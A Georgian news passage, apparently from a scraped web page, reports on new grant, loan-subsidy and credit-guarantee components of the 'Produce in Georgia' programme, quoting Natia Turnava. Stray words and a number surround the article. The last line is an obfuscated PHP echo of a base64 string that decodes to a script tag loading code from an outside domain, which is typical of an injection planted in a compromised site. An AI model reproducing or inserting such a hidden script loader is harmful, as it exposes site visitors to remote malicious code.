celsiusi
ავერსი შნაიდერი
პროგრამას „აწარმოე საქართველოში" რამდენიმე კომპონენტი ემატება. თურნავას თქმით, ერთ-ერთი კომპონენტი არის ადგილობრივი წარმოების წახალისების ხელშემწყობი, რაც ნიშნავს, საექსპორტო, ან იმპორტის ჩამნაცვლებელი დარგების დახმარებას.
 
„დაახლოებით 60-მდე დარგია, სადაც შეგვიძლია განვავითაროთ ექსპორტი, რაც ჩვენი სავალუტო შემოსავალი და ლარის სიძლიერეა, ან ადგილობრივ ბაზარზე კონკურენციაში შევიდეთ იმპორტირებულ საქონელთან და ჩავანაცვლოთ იმპორტი. ეს დარგები მიიღებენ ჩვენგან კომბინირებულ დახმარებას, ეს არის ერთდროულად სესხის პროცენტის სუბსიდირება, საკრედიტო-საგარანტიო სქემა, რითაც ჩვენ უზრუნველვყოფთ მათ ბანკებში და ამას დაემატება გრანტი, სრულიად ახალი კომპონენტი“, - განაცხადა თურნავამ.
 
მისივე განმარტებით, გრანტი იქნება აღებული სესხის 15%-ის ოდენობით, არა უმეტეს ნახევარი მილიონი ლარისა.
 
„ეს ძალიან მნიშვნელოვანია, რადგან გაცილებით აიაფებს და ხელმისაწვდომს ხდის დაფინანსებას მცირე ბიზნესებისთვის. ეს არის მნიშვნელოვანი ხელშეწყობა ისეთი დარგებისთვის, როგორიც არის სამშენებლო მასალების ბიზნესი, პლასტმასის, მინის წარმოება, მანქანათმშენებლობა, დანადგარები, მანქანების ნაწილები, საფეიქრო მრეწველობა, ტექსტილი და ა.შ. ესენია დარგები, რომლებსაც განვითარების პოტენციალი აქვს“, - განაცხადა ნათია თურნავამ.
 
მისივე განმარტებით, სესხის სუბსიდირება იმ დრომდე გაგრძელდება, ვიდრე კომპანია ამ სესხს მოემსახურება.
1144
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");